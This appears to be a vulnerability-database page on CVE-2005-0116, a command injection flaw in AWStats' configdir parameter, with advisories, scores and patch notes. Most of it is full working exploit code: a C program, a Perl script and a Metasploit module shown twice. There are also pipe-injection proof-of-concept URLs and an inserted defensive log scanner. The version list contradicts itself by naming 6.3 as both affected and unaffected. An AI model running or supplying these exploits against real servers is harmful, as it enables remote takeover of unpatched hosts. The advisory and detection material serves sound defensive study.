CVE-2005-0116
CVSS 7.5
Published: 2005-01-18 00:00:00
Revised: 2008-09-05 16:45:22

[Original] AWStats 6.1, and other versions before 6.3, allows remote attackers to execute arbitrary commands via shell metacharacters in the configdir parameter to awstats.pl.


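[CNNVD] AWStats awstats.pl Remote Command Execution Vulnerability (CNNVD-200501-256)

        AWStats is a web-based program for website traffic statistics.
        A command execution vulnerability exists in AWStats 6.1 and other versions before 6.3.
        Because awstats.pl does not sufficiently filter the value of the configdir parameter, a remote attacker can exploit this vulnerability to execute arbitrary commands.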

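- CVSS (Base Score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: NETWORK [the attacker needs neither internal-network nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (Weakness Category)

CWE-20 [Improper Input Validation]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not currently available

- OVAL (Technical Details for Detection)

No related OVAL definitions found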

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0116
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0116
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-256
(Official data source) CNNVD

- Other Links and Resources

http://www.kb.cert.org/vuls/id/272296
(VENDOR_ADVISORY)  CERT-VN  VU#272296
http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false
(VENDOR_ADVISORY)  IDEFENSE  20050117 AWStats Remote Command Execution Vulnerability
http://secunia.com/advisories/13893/
(VENDOR_ADVISORY)  SECUNIA  13893
http://awstats.sourceforge.net/docs/awstats_changelog.txt
(VENDOR_ADVISORY)  CONFIRM  http://awstats.sourceforge.net/docs/awstats_changelog.txt
http://www.securityfocus.com/bid/12298
(UNKNOWN)  BID  12298
http://www.osvdb.org/13002
(UNKNOWN)  OSVDB  13002
http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf
(UNKNOWN)  MISC  http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf

- Vulnerability Information

AWStats awstats.pl Remote Command Execution Vulnerability
High risk  Input validation
2005-01-18 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and Patches

        The vendor has released an upgrade patch that fixes this security issue. The patch is available at:
        http://awstats.sourceforge.net/#DOWNLOAD

- Vulnerability Information (772)

AWStats (6.0-6.2) configdir Remote Command Execution Exploit (c code) (EDBID:772)
cgi webapps
2005-01-25 Verified
0 Thunder
/*
AwStats exploit by Thunder, molnar_rcs@yahoo.com

This exploit makes use of the remote command execution bug discovered in
AwStats ver 6.2 and below. The bug resides in the awstats.pl perl script.
The script does not sanitise correctly the user input for the
`configdir` parameter. If the users sends a command prefixed and postfixed
with | , the command will be executed. An example would be:

Let's execute '/usr/bin/w':
>
http://localhost/cgi-bin/awstats.pl?configdir=%20|%20/usr/bin/w%20|%20
<

Awstat output:
>
Error: LogFile parameter is not defined in config/domain file
Setup (' | /usr/bin/w | /awstats.localhost.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
<

That's it. Our command was executed.
This bug is fixed in AwStats ver 6.3 and a patch was released for all versions, but vulnerable
AwStat is still available for download on several sites (ex. www.topshareware.com).

Type `gcc awexpl.c -o awexpl` to compile the exploit and `./awexpl -u` for usage.

Note:
Just indexing the commands with | will not always work, or might not work at all. I checked
it on my own awstats 6.0 install, and it failed. So, whoever tried the same on his own
script and was surprised to see that (although the version he uses is said to be prone to the
remote command execution bug) nothing happened, should patch or upgrade to Awstat 6.3 asap.
As far as I know all unpatched versions prior to 6.3 are vulnerable and commands prefixed and
postfixed by a | character WILL be executed. Beware!

Oh, I almost forgot, the disclaimer :)

THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
AND WITHOUT ANY WARRANTY.

Robert Molnar,
21th jan 2005
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
//#include <unistd.h>
#include <arpa/inet.h>
#include <string.h>

void usage(char *pname)
{
printf("# AWStats exploit by Thunder, molnar_rcs@yahoo.com\n"
"# Usage: %s -h <host> -i <ip> [-s Script] [-p Path] [-o Port] [-c Commands] [-u]\n"
"\t-h : target host name, default is `localhost`\n"
"\t-i : target IP (to wich host name resolvs)\n"
"\t-s : script name, default is `awstats.pl`\n"
"\t-p : script path, default is `/cgi-bin`\n"
"\t-o : specify port to connect to, default is `80`\n"
"\t-c : specify commands to be executed, the exploit will create a\n"
"\t : file named `OWNED` in `/tmp` by default\n"
"\t-u : usage\n\n"
"# Example: %s -h localhost -i 127.0.0.1\n"
"# : %s -h localhost -i 127.0.0.1 -p /~user/cgi-bin\n"
"# : %s -h localhost -i 127.0.0.1 -p /~user/cgi-bin -c \"/usr/bin/id\"\n"
, pname, pname, pname, pname);

exit(0);
}

char * urlEncode(char *inC)
{
int c, i, j = 0;
char *h = "0123456789abcdef";
char retval[1024], res[3072];
memcpy(retval, inC, strlen(inC));
retval[strlen(inC)] = '\0';
for(i=0; i < strlen(inC); i++){
c = retval[i];
if( 'a' <= c && c <= 'z'
|| 'A' <= c && c <= 'Z'
|| '0' <= c && c <= '9'
|| c == '-' || c == '_' || c == '.')
res[j++] = c;
else {
res[j++] = '%';
res[j++] = h[c >> 4];
res[j++] = h[c & 0x0f];
}
}
return res;

}


char *buildHeader(char *Xhost, char *Xpath,char *Xscript, char *exeCmd)
{
char Header[5196];

sprintf( Header,
"GET %s/%s?configdir=%s HTTP/1.1\r\n"
"Accept: text/xml,application/xml,application/xhtml+xml,"
"text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,"
"image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)\r\n"
"Host: %s\r\n"
"Connection: Keep-Alive\r\n"
"Cache-Control: no-cache\r\n"
"\r\n"
, Xpath, Xscript, urlEncode(exeCmd), Xhost );
return Header;
}


void exploit(char *Xhost, char *Xpath,char *Xscript, char *exeCmd, char *Xip, int Xport)
{
int sock, disp = 0, count = 0;
struct sockaddr_in sockaddrX;
char *oData, iData;

printf("# AWStats Exploit by Thunder, molnar_rcs@yahoo.com\n");
sockaddrX.sin_port = htons(Xport);
sockaddrX.sin_family = AF_INET;
sockaddrX.sin_addr.s_addr = inet_addr(Xip);
if(Xhost == "localhost")
{
printf("# Using hardcoded (default) options, use `-u` for usage\n"
);
}
printf("# Connecting to %s (%s) ...", Xhost, Xip);
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (connect(sock, (struct sockaddr*)&sockaddrX, 16) < 0)
{
printf("\n# Connect to %s (%s) on port %i failed!\n", Xhost, Xip, Xport);
exit(-1);
}
printf("Done!\n# Building header...");
oData = buildHeader(Xhost, Xpath, Xscript, exeCmd);
printf("Done!\n# Sending data...");
send(sock, oData, strlen(oData), 0);

/* the code below reads the server response byte by byte, this is not needed
while(read(sock, &iData, 1))
putchar(iData);
*/
printf("Done!\n# Exploit finished.\n");
close(sock);
}





int main(int argc, char * argv[])
{
extern char *optarg;
extern int optind, optopt;

int c,
Xport = 80,
isgood = 0;

char *Xhost = "localhost" ,
*Xip = "127.0.0.1",
*Xscript = "awstats.pl",
*Xpath = "/cgi-bin";

char exeCmd[1024] = "| echo \"You have been Owned, update AWstat or patch\" > /tmp/OWNED | ";

while ((c = getopt(argc, argv, ":uh:i:s:p:c:o:")) != -1)
{

switch(c)
{
case 'h':
Xhost = optarg;
isgood++;
break;

case 'i':
Xip = optarg;
isgood++;
break;

case 's':
Xscript = optarg;
break;

case 'p':
Xpath = optarg;
break;

case 'c':
if(strlen(optarg) > 1018)
{
printf("# `-c` argument can't exceed 1024 bytes (command to long)");
exit(0);
}
sprintf(exeCmd, " | %s | ", optarg);
break;

case 'o':
Xport = atoi(optarg);
break;

case 'u':
usage(argv[0]);
break;

case '?':
printf("# Unknown option `-%c`\n", optopt);
break;


}
}


if( isgood == 1)
{
printf("# Please specify both host `-h` and ip `-i`\n");
exit(0);
}

exploit(Xhost, Xpath, Xscript, exeCmd, Xip, Xport);
return 0;
}

// milw0rm.com [2005-01-25]
		

- Vulnerability Information (773)

AWStats (6.0-6.2) configdir Remote Command Execution Exploit (perl code) (EDBID:773)
cgi webapps
2005-01-25 Verified
0 GHC
#!/usr/bin/perl
#---GHC---------------------------------#
#Remote command execution exploit #
#Product:                                        #
#Advanced Web Statistics 6.0 - 6.2    #
#URL:http://awstats.sourceforge.net  #
#Greets & respects to our friends:     #
#1dt.w0lf and all rst.void.ru              #
#Special greets 2 d0G4                    #
#& cr0n for link on bugtraq               #
#---not-PRIVATE-already--------------#
# bug found by iDEFENSE                 #
# http://www.idefense.com/             #
# application/poi/display?                 #
# id=185&type=vulnerabilities          #
# &flashstatus=true                         #
#-----------------------------------------#

use IO::Socket;
$banner = "
#################################################################
GHC 2005
Remote command execution exploit for:
Advanced Web Statistics 6.0 - 6.2
Usage:
>perl ./GHCaws.pl www.server.net /cgi-bin/awredir.pl \"uname -a\"
#################################################################
";

$bug_param = 'configdir';
$id_start = 'b_exp';
$id_exit = 'e_exp';
$id_print = 0;
$http_head = "\n\n";

sub Print_Report {
$str = $_[0];
if ($str =~ m/$id_exit/i) {
exit;
}
if ($str =~ m/$id_start/i) {
$str =~ s/$id_start//ig;
$id_print = 1;
}
if ($id_print == 1) {
print "$str";
}
}

sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Error\n";
print $socket "GET $dir".'?'.$bug_param.'='."$expl HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($report = <$socket>) {
&Print_Report("$report");
}
}


print "$banner";
if ($ARGV[0] && $ARGV[1] && $ARGV[2]) {
$server = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2]; }
else {
exit;
}

$expl = '|echo '.''.';echo '.$id_start.';'.$cmd.';echo '.$id_exit.';%00';
$expl =~ s/\W/"%".sprintf("%x",ord($&))/eg;
&ConnectServer;

# milw0rm.com [2005-01-25]
		

- Vulnerability Information (16905)

AWStats (6.1-6.2) configdir Remote Command Execution (EDBID:16905)
cgi webapps
2009-12-26 Verified
0 metasploit
##
# $Id: awstats_configdir_exec.rb 7970 2009-12-26 03:31:20Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AWStats configdir Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
					AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2
					are vulnerable.
			},
			'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7970 $',
			'References'     =>
				[
					['CVE', '2005-0116'],
					['OSVDB', '13002'],
					['BID', '12298'],
					['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jan 15 2005',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
				], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' =>
			{
				'configdir' => '|echo;cat /etc/hosts;echo|'
			}
		}, 25)

		if (res and res.body.match(/localhost/))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		command = Rex::Text.uri_encode(payload.encoded)
		urlconfigdir = datastore['URI'] + "?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|"

		res = send_request_raw({
			'uri'     => urlconfigdir,
			'method'  => 'GET',
			'headers' =>
			{
				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
				'Connection' => 'Close',
			}
		}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")

			m = res.body.match(/YYY\n(.*)\nYYY/m)

			if (m)
				print_status("Command output from the server:")
				print("\n" + m[1] + "\n\n")
			else
				print_status("This server may not be vulnerable")
			end
		else
			print_status("No response from the server")
		end
	end

end

		

- Vulnerability Information (F82351)

AWStats configdir Remote Command Execution (PacketStormID:F82351)
2009-10-30 00:00:00
Matteo Cantoni  
exploit,arbitrary,cgi
CVE-2005-0116

This Metasploit module exploits an arbitrary command execution vulnerability in the AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 are vulnerable.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AWStats configdir Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
					AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2
					are vulnerable.
			},
			'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-0116'],
					['OSVDB', '13002'],
					['BID', '12298'],
					['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},		
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jan 15 2005',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
				], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' =>
			{
				'configdir' => '|echo;cat /etc/hosts;echo|'
			}
		}, 25)

		if (res and res.body.match(/localhost/))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		command = Rex::Text.uri_encode(payload.encoded)
		urlconfigdir = datastore['URI'] + "?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|"

		res = send_request_raw({
			'uri'     => urlconfigdir,
			'method'  => 'GET',
			'headers' =>
			{
				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
				'Connection' => 'Close',
			}
		}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")

			m = res.body.match(/YYY\n(.*)\nYYY/m)

			if (m)
				print_status("Command output from the server:")
				print("\n" + m[1] + "\n\n")
			else
				print_status("This server may not be vulnerable")
			end
		else
			print_status("No response from the server")
		end
	end

end

    

- Vulnerability Information (F36177)

rt-sa-2005-006.txt (PacketStormID:F36177)
2005-02-25 00:00:00
 
advisory,remote
CVE-2005-0116

The workaround provided to fix the AWStats flaw in versions 6.2 and below fails to properly block remote command execution.

Advisory: Awstats official workaround flaw

A group of students at our lab called RedTeam found a flaw in the
official workaround for the remote command execution vulnerability
in awstats discovered by iDefense.


Details
=======

Product: Awstats
Affected Version: <= 6.2
Immune Version: 6.3
OS affected: all
Security-Risk: high
Remote-Exploit: yes
Vendor-URL: http://awstats.sourceforge.net
Vendor-Status: informed
Advisory-URL: http://tsyklon.informatik.rwth-aachen.de/redteam/advisories/rt-sa-2005-006
Advisory-Status: public
CVE: GENERIC-MAP-NOMATCH

Introduction
============

iDefense found a remote command execution vulnerability in awstats <=
6.2, see CAN-2005-0116.

The official awstats website tells users that they are safe from remote
command execution if they set the variable
$!AllowToUpdateStatsFromBrowser to 0. This is not true, as the exploit
can still be triggered.

More Details
============

In awstats.pl the variable $configdir, which is used to exploit, can
still be set remotely. Setting $!AllowToUpdateStatsFromBrowser to 0
only removes the link to the button which can be used to trigger
updates. The variable can still be assigned per GET request.

Proof of Concept
================

http://path/to/awstats/awstats.pl?configdir=|cd%20/ 
tmp;%20touch%20evilfile;

Workaround
==========

Use the workaround provided by iDefense. See their advisory for the
original vulnerability.

Fix
===

Fixed in version 6.3.

Security Risk
=============

High, as arbitrary commands can be executed on the vulnerable system.

History
=======

2005-02-12 eldy@users.sourceforge.net informed
2005-02-12 CVE number requested
2005-02-14 issue does not qualify for a CVE number. posted.

RedTeam
=======

RedTeam is a penetration testing group working at the Laboratory for
Dependable Distributed Systems at RWTH-Aachen University. You can find
more Information on the RedTeam Project at
http://tsyklon.informatik.rwth-aachen.de/redteam/


-- 
Maximillian Dornseif, Dipl. Jur., CISSP
Laboratory for Dependable Distributed Systems, RWTH Aachen University
Tel. +49 241 80-21431 - http://md.hudora.de/
    

- Vulnerability Information

13002
AWStats awstats.pl configdir Parameter Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability Description

AWStats contains a flaw that may allow a malicious user to issue arbitrary commands under the web server privileges. The issue is triggered when using the pipe character (|) and shell metacharacters in the 'configdir' variable of the awstats.pl script. Such input is not sanitized before being passed to the perl 'open()' command to be executed.
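
The description above says the configdir value reaches Perl's open() unsanitized. As an added example (not part of the original database entry or of AWStats), the following Python scans web-server access logs for awstats.pl requests whose decoded configdir is not a plain directory path. The log format, the allowlist and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Prefix of the common/combined log format: client, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Assumption for this example: a legitimate configdir is a plain directory path.
SAFE_VALUE = re.compile(r'[A-Za-z0-9_./:\\-]*')

# Constructed sample lines; the two flagged values are ones already quoted on this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jan/2005:10:00:01 +0000] '
    '"GET /cgi-bin/awstats.pl?config=example.com HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Jan/2005:10:02:13 +0000] '
    '"GET /cgi-bin/awstats.pl?configdir=%20|%20/usr/bin/w%20|%20 HTTP/1.1" 200 731',
    '203.0.113.5 - - [18/Jan/2005:10:03:40 +0000] '
    '"GET /awstats/awstats.pl?configdir=%7C/bin/ls%7C HTTP/1.1" 200 702',
    '192.0.2.10 - - [18/Jan/2005:10:05:00 +0000] '
    '"GET /cgi-bin/awstats.pl?config=example.com&configdir=/etc/awstats HTTP/1.1" 200 5090',
]


def configdir_findings(target):
    """Return decoded configdir values in a request target that fail the allowlist."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("awstats.pl"):
        return []
    findings = []
    # Split on '&' only: ';' can itself be part of a hostile value.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote_plus(name).lower() != "configdir":
            continue
        value = unquote_plus(raw)
        # fullmatch so that a trailing newline or NUL cannot slip past the check.
        if not SAFE_VALUE.fullmatch(value):
            findings.append(value)
    return findings


def scan(lines):
    """Return (client, timestamp, status, decoded value) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in configdir_findings(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status")), value))
    return hits


if __name__ == "__main__":
    for ip, ts, status, value in scan(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} configdir={value!r}")
```

A 200 status on a flagged request says nothing about whether the command ran: the sample AWStats output quoted earlier on this page is an ordinary error page returned after execution.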

- Timeline

2005-01-01 Unknown
2005-01-26 Unknown

- Solution

Upgrade to version 6.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability Information

AWStats Remote Command Execution Vulnerability
Input Validation Error 12298
Yes No
2005-01-15 12:00:00 2006-12-13 03:43:00
The discoverer of this issue wishes to remain anonymous.

- Affected Versions

S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
Gentoo Linux
AWStats AWStats 6.2
AWStats AWStats 6.1
AWStats AWStats 6.0
AWStats AWStats 5.9
AWStats AWStats 5.8
AWStats AWStats 5.7
AWStats AWStats 5.6
AWStats AWStats 5.5
AWStats AWStats 5.4
AWStats AWStats 5.3
AWStats AWStats 5.2
AWStats AWStats 5.1
AWStats AWStats 5.0
AWStats AWStats 6.3

- Unaffected Versions

AWStats AWStats 6.3

- Discussion

AWStats is reported prone to a remote arbitrary-command-execution vulnerability because the software fails to sufficiently sanitize user-supplied data.

An attacker can prefix arbitrary commands with the '|' character and have them execute in the context of the server through a URI parameter.

This issue was originally specified in BID 12270 (AWStats Multiple Unspecified Remote Input Validation Vulnerabilities). Due to the availability of further details, it is being assigned a new BID.

- Exploit

An exploit is not required.

The following proof of concept supplied by <newbug@chroot.org> is available:

http://www.example.com/awstats/awstats.pl?configdir=|/bin/ls|

Proof of concept GHCaws.pl has been supplied by GHC.

Proof of concept awexpl.c has been supplied by Thunder <molnar_rcs@yahoo.com>.

- Solution

The vendor has released an upgrade to address this issue. Please see the references for more information.


AWStats AWStats 5.0

AWStats AWStats 5.1

AWStats AWStats 5.2

AWStats AWStats 5.3

AWStats AWStats 5.4

AWStats AWStats 5.5

AWStats AWStats 5.6

AWStats AWStats 5.7

AWStats AWStats 5.8

AWStats AWStats 5.9

AWStats AWStats 6.0

AWStats AWStats 6.1

AWStats AWStats 6.2
